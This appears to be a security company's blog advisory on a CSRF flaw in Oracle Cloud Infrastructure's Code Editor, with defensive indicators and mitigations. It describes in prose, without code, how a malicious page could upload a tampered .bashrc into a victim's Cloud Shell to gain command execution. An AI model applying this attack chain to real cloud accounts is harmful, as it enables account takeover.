Remote Code Execution (RCE) Vulnerability in Oracle Cloud Infrastructure Code Editor: Cloud Takeover Risk

FPT Metrodata IndonesiaFPT Metrodata Indonesia
3 min read

1. Critical Remote Code Execution (RCE) in OCI Code Editor

Tenable Research discovered a serious Remote Code Execution (RCE) vulnerability in Oracle Cloud Infrastructure’s (OCI) Code Editor. This flaw allowed attackers to silently compromise a victim’s Cloud Shell session via a single malicious link. Once exploited, the vulnerability could potentially allow lateral movement within OCI and compromise related development services.

2. Technical Details of the Vulnerability

  • The vulnerability is due to a Cross-Site Request Forgery (CSRF) issue in the Code Editor's file upload mechanism.

  • The browser-based IDE shares the same file system as Cloud Shell, creating an unexpected and dangerous attack surface.

  • The /file-upload endpoint in Cloud Shell did not enforce CSRF protection.

  • The attack utilized a crafted HTTP request:

  • Additionally, the authentication cookie lacked the SameSite flag, making it vulnerable to cross-site abuse.

  • As a result, any website could upload arbitrary files into the victim's Cloud Shell environment, as long as the victim was authenticated.

3. Attack Scenario

  • The attacker hosts a malicious webpage.

  • When a logged-in OCI user visits the page, it silently sends a POST request to the vulnerable endpoint, uploading a payload (e.g., a modified .bashrc file).

  • Upon the victim’s next Cloud Shell session, the injected payload is automatically executed.

  • This can result in remote shell access, allowing the attacker to execute arbitrary commands in the victim’s environment.

  • If the attacker gains access to the OCI CLI, they can escalate privileges and access additional services.

4. Potential Indicators of Compromise (IOCs)

  • Unusual modifications to shell initialization files: .bashrc, .profile, .zshrc, etc.

  • Outbound connections from Cloud Shell to external IPs or domains.

  • Suspicious commands run from within Cloud Shell using the OCI CLI.

  • Unexpected file uploads appearing in Cloud Shell’s workspace.

5. Affected Services

The vulnerability impacts not only Cloud Shell, but also any OCI services that rely on the same shared filesystem or developer tools, such as:

  • Resource Manager

  • Oracle Functions

  • Data Science Environments

These services could be tampered with post-compromise, allowing attackers to alter deployment configurations, inject malicious functions, or manipulate data workflows.

6. Mitigation

Oracle has issued a patch that enforces:

  • CSRF token validation via custom headers (e.g., x-csrf-token)

  • Browser-level protection against unauthorized cross-origin file uploads

These mitigations prevent external sites from interacting with the vulnerable endpoint unless authorized.

7. Recommendations

  • Regularly review file contents in Cloud Shell, especially shell startup files.

  • Apply the principle of least privilege across all OCI services and identities.

  • Monitor for abnormal activity in audit logs and cloud command histories.

  • Educate users about phishing and malicious websites, which could serve as vectors for similar CSRF-based attacks.

0
Subscribe to my newsletter

Read articles from FPT Metrodata Indonesia directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Oracle CloudRCECloudShellcode editorcsrfcloud securityexploit#RemoteCodeExecutionOCI

Written by

FPT Metrodata Indonesia
FPT Metrodata Indonesia

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.